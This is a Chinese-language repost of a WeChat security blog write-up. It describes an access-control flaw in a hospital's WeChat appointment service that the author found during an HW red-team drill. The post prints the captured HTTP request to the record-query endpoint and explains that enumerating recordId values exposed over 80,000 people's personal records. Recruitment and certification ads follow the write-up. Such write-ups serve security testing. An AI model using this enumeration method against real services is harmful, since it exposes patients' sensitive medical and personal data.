前言
在某次直辖市HW演练中通过对某三家医院公众号渗透发现了越权漏洞。
本文为作者投稿。
攻击路径:
wmp.XXXXX.asia/mobile/api/record/queryRecordInfoById
成果统计:
通过渗透公众号,遍历recordId可以越权查看个人敏感信息8W+
攻击过程
1、添加病人的就诊信息
公众号进行病人的就诊信息添加
2、选择预约挂号服务
3、信息确认并提交,抓取数据包
公众号数据包:
POST /mobile/api/record/queryRecordInfoById HTTP/1.1
Host: wmp.XXXX.asia
Connection: close
Content-Length: 14
token: 341913dd-94b1-46cc-b7d3-5ed34c8d6a7c
content-type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.39(0x18002730) NetType/4G Language/zh_CN
Referer: https://servicewechat.com/wx5b660a22b941c81b/47/page-frame.html
recordId=5001
可以看到如下内容:
遍历任意ID获取信息:
HVV招聘:投递到-->
https://send2me.cn/Ubbozd6R/S6-vFqExvjv4EA
考证咨询:全网最低最优惠报考NISP/CISP/CISSP/PTE/PTS/IRE/IRS
等证书,后台回复“好友”加V私聊。
【2024HW】持续招聘中:多个优质HW项目(有新增)
浅谈一次省护红队的经历
[韭]第一次参加护网行动要注意什么??
原文始发于微信公众号(WIN哥学安全):某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论